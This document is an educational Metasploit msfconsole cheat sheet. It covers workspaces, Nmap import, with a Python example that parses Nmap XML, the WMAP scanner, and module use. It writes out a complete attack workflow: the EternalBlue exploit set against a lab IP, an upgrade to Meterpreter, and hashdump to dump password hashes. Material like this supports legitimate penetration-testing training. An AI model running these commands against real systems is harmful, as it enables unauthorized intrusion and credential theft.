msfconsole

Workspace

  • A workspace is a container for organizing and managing penetration testing data.

  • Use workspace to create, switch, or delete workspaces.

  • Example:

    msf6> workspace -a NewWorkspace  # Add a new workspace
    msf6> workspace NewWorkspace     # Switch to the new workspace

Global Variables (setg)

  • setg sets global variables that persist across modules and sessions, whereas set applies only to the module currently selected.

msf6> setg RHOSTS 192.168.1.1  # Set global target IP

Importing Nmap Results

Metasploit can import Nmap scan results to populate target information.

msf6> db_import /path/to/nmap_scan.xml
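To make concrete what db_import actually pulls out of an Nmap XML file (live hosts, their addresses and hostnames, and the open ports with service banners), here is a small standalone parser written as an added example; it is not Metasploit's importer and does not talk to the msf database. The sample XML is constructed inline to look like `nmap -sV -oX` output, and skipping hosts Nmap marked "down" is a simplification of the real importer's behaviour.

```python
import xml.etree.ElementTree as ET

# Constructed sample Nmap XML (not a real scan), mirroring the structure
# of a file you would hand to `db_import /path/to/nmap_scan.xml`.
SAMPLE_NMAP_XML = """
<nmaprun scanner="nmap" args="nmap -sV -oX nmap_scan.xml 192.168.1.0/24">
  <host>
    <status state="up"/>
    <address addr="192.168.1.1" addrtype="ipv4"/>
    <hostnames><hostname name="gateway.lab.test" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="8.9p1"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="closed"/>
        <service name="http"/>
      </port>
    </ports>
  </host>
  <host>
    <status state="down"/>
    <address addr="192.168.1.2" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return a list of live hosts with their open services.

    Each host is a dict: address, hostname (or None) and a list of
    services, each with port, proto, name and a version string ("info").
    This approximates what ends up in the msf hosts/services tables.
    """
    root = ET.fromstring(xml_text)
    hosts = []
    for host in root.findall("host"):
        status = host.find("status")
        # Simplification (assumption): only hosts reported "up" are kept.
        if status is None or status.get("state") != "up":
            continue
        addr_el = host.find("address[@addrtype='ipv4']")
        if addr_el is None:
            continue
        hostname_el = host.find("hostnames/hostname")
        services = []
        for port in host.findall("ports/port"):
            state = port.find("state")
            # Closed/filtered ports are not recorded as services.
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            name = svc.get("name") if svc is not None else None
            # Join product and version into one banner-style string,
            # dropping whichever attributes Nmap did not fill in.
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            services.append({
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": name,
                "info": " ".join(p for p in parts if p),
            })
        hosts.append({
            "address": addr_el.get("addr"),
            "hostname": hostname_el.get("name") if hostname_el is not None else None,
            "services": services,
        })
    return hosts


def hosts_exposing(hosts, port, proto="tcp"):
    """Addresses of hosts with the given port open, e.g. to inventory SMB exposure."""
    return [h["address"] for h in hosts
            if any(s["port"] == port and s["proto"] == proto for s in h["services"])]


if __name__ == "__main__":
    for h in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(h["address"], h["hostname"])
        for s in h["services"]:
            print("  %d/%s %s %s" % (s["port"], s["proto"], s["name"], s["info"]))
    print("SMB exposed on:", hosts_exposing(parse_nmap_xml(SAMPLE_NMAP_XML), 445))
```

Running the file prints the one live host with its two open services and lists it under "SMB exposed on"; the same inventory is what `hosts` and `services` show inside msfconsole after a db_import, and what a blue team would diff against an expected baseline.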

WMAP

WMAP is a web application vulnerability scanner integrated into Metasploit. It is used to identify vulnerabilities in web applications.

msf6> load wmap
msf6> wmap_sites -a http://example.com
msf6> wmap_run -t

Working with Modules

Metasploit is modular, allowing users to perform specific tasks. The main types of modules are:

  • Auxiliary Modules: Perform information gathering, enumeration, and other non-exploit tasks (e.g., sniffing, fuzzing, or brute-forcing).

  • Exploit Modules: Designed to exploit vulnerabilities in target systems.

  • Post-Exploitation Modules: Used after gaining access to a system (e.g., privilege escalation, data extraction).

  1. Searching for Modules:

Use the search command to find modules based on keywords, type, or platform.

    msf6> search "key word" type:exploit platform:windows

  2. Using a Module:

After identifying a module, use the use command to select it.

    msf6> use exploit/windows/smb/ms17_010_eternalblue

  3. Setting Module Options:

Use options to view required and optional parameters. Set parameters using the set command.

    msf6> options
    msf6> set RHOSTS 192.168.1.1
    msf6> set LHOST 192.168.1.2

  4. Running the Module:

Use run or exploit to execute the module.

    msf6> exploit

Post-Exploitation

  1. Upgrading to Meterpreter:

    • After gaining a basic shell, upgrade it to a Meterpreter session for advanced post-exploitation capabilities.

    • Example:

      msf6> sessions -u <SESSION_ID>
  2. Meterpreter:

    • A powerful, extensible payload that provides advanced features like file manipulation, keylogging, and privilege escalation.

    • Example Commands:

      meterpreter> sysinfo          # Get system information
      meterpreter> getuid           # Show the user the session is running as
      meterpreter> hashdump         # Dump password hashes

References

  • Metasploit Documentation: The official documentation is a comprehensive resource for understanding and using Metasploit.

Example Workflow

  1. Start msfconsole:

    $ msfconsole
  2. Search for a module:

    msf6> search type:exploit platform:windows
  3. Use the module and set options:

    msf6> use exploit/windows/smb/ms17_010_eternalblue
    msf6> set RHOSTS 192.168.1.1
    msf6> set LHOST 192.168.1.2
  4. Run the exploit:

    msf6> exploit
  5. Upgrade to Meterpreter:

    msf6> sessions -u -1
  6. Perform post-exploitation tasks:

    meterpreter> sysinfo
    meterpreter> hashdump
